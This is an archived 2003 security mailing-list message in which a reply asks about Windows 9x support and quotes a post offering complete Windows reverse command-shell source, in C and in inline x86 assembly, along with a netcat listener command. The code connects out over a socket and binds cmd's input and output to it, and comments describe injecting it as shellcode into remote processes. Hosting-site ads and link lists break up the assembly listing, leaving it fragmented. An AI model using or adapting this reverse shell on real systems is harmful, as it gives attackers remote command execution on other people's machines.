Hosting Provided By

RE: Windows reverse Shell #2

From: s7726 <s7726(at)yahoo.com>
Date: Fri Feb 07 2003 - 13:09:45 EST

Could this work on a win9x machine? with some mods of course. namely command rather than cmd, or is this strictly an NT/2k thing?

Thanx,
Gavin S.

-----Original Message-----
From: NetNinja [mailto:netninja@hotmail.kg] Sent: Friday, February 07, 2003 4:45 AM
To: vuln-dev@securityfocus.com
Subject: Windows reverse Shell #2

Hello folks,

Thnx everyone for ur replies.
Today i found time to have a careful look at my reverse shell C source code. THe problem that i had was very simple. In my C source i forgot to initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's code did initilize that struct, so big thnx to him. Another thing u have to do is to cast socket handle returned from WSASocket call to ptr type and pass it on to stdInput,stdOutput and stdErr of STARTUPINFO struct.
That's it!
If anyone is interested in reverse cmd shell for windows i have included both C and inline asm version. so have a look at them.

C --------------- /* reverse cmd shell

Will spit back command shell on ur listening netcat on ur localhost (127.0.0.2) port 55

set up ur netcat eg. nc -l -p 55 -vv

Adik (netninja@hotmail.kg)
http://netninja.to.kg

Do you need help?

*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

void main(int argc, char *argv[])
{

        WSADATA wsaData;
        SOCKET hSocket;
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        struct sockaddr_in adik_sin;
        memset(&adik_sin,0,sizeof(adik_sin));
        memset(&si,0,sizeof(si));
        WSAStartup(MAKEWORD(2,0),&wsaData);
        hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
        adik_sin.sin_family = AF_INET;
        adik_sin.sin_port = htons(55);
        adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
        connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
        CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
        ExitProcess(0);

}

------[ end C ]--------------

----[ inline ASM ]------
/*
reverse cmd shell
inline asm version

reverse cmd shell on address 127.0.0.1 port 55

Adik (netninja@hotmail.kg)
http://netninja.to.kg

Do you need more help?

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

#define GP 0x77E7B332
reverse byte order 0x0037=3700
#define IPADDR 0x0100007F //
7F000001//(inet_addr("127.0.0.1"))

void main(int argc, char *argv[])
{

char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"

                 "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
        char *i=ptr;

        WSADATA wsaData;
        WSAStartup(MAKEWORD(2,0),&wsaData);             //initialize

winsock, this is not done below

// usually when u inject ur shellcode into remote process

// socket is already initialized

        __asm
        {

                mov edi, i
                dec edi

                push ebp
                mov ebp,esp
                sub esp,0x20

                mov ecx,ebp
                sub ecx,4h
                push ecx

load_lib:
                inc edi
                cmp byte ptr[edi],0
                je done_loadin

                push edi
                mov eax, LL
                call eax                        //LoadLibrary("Lib")

                mov [ebp-4],eax         //places lib handle into ebp-4
                xor eax,eax
                repne scasb

load_func:

                cmp byte ptr[edi],0
                je load_lib

                push edi

                mov ebx, dword ptr[ebp-4] //lib handle
                push ebx
                mov eax, GP
                call eax

//GetProcAddress("Function")

                pop ecx
Can we help you? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
                sub ecx,4
                mov dword ptr[ecx], eax
                push ecx
                xor eax,eax
                repne scasb

                jmp load_func

done_loadin:

                xor eax,eax
                inc edi
                mov dword ptr[ebp-18h],edi
                mov ecx,50                                      //make some

space for structs
push_em:

                push eax
                loop push_em

                push 0x1
                push 0x2
                call WSASocketA

                mov ebx, eax            //copies sockethandle returned into

ebx

                  //ebp-20h
                mov dword ptr[ebp-40h],0x2
//sockaddr_in
                mov word ptr[ebp-3Eh],PORT
                mov dword ptr[ebp-3Ch],IPADDR

                //mov dword ptr[ebp-40h],process_information

                mov dword ptr[ebp-94h],0x44             //sizeof startupinfo
                mov dword ptr[ebp-68h],0x100    //dwFlags
                mov dword ptr[ebp-5Ch],ebx              //stdio
                mov dword ptr[ebp-58h],ebx              //stdout
                mov dword ptr[ebp-54h],ebx              //stderr

                push 0x10
//sizeof sockaddr_in
                lea edx, dword ptr[ebp-40h]
                push edx
//ptr to sockaddr_in
                push ebx
//socket handle
                call connect

                lea edx,dword ptr[ebp-50h]
                push edx                                        //push
proc_info
                lea edx,dword ptr[ebp-94h]
                push edx                                        //push ptr
to startupinfo
                xor edx,edx
                push edx
                push edx
                push edx
                inc edx
//inheritHandles = true
                push edx
                dec edx
Don't know where to look next? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
                push edx
                push edx
                mov eax,CMD_STR                         //ptr to "cmd" str
                push eax
                push edx
                call CreateProcessA

                push edx
                call ExitProcess

        }

Can't find what you're looking for?

}

----[ end ]------

--
Best regards,
 Adik        (NetNinja)                          mailto:netninja@hotmail.kg

Received on Fri Feb 7 13:14:12 2003

This message: [ Message body ]
Next message: Ali Saifullah Khan: "Re: Windows reverse Shell #2"
Previous message: Andrei Mikhailovsky: "OpenSSH segfault (Debian distro)"
In reply to NetNinja: "Windows reverse Shell #2"
Next in thread: Ali Saifullah Khan: "Re: Windows reverse Shell #2"
Reply: Ali Saifullah Khan: "Re: Windows reverse Shell #2"
Reply: NetNinja: "Re[2]: Windows reverse Shell #2"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT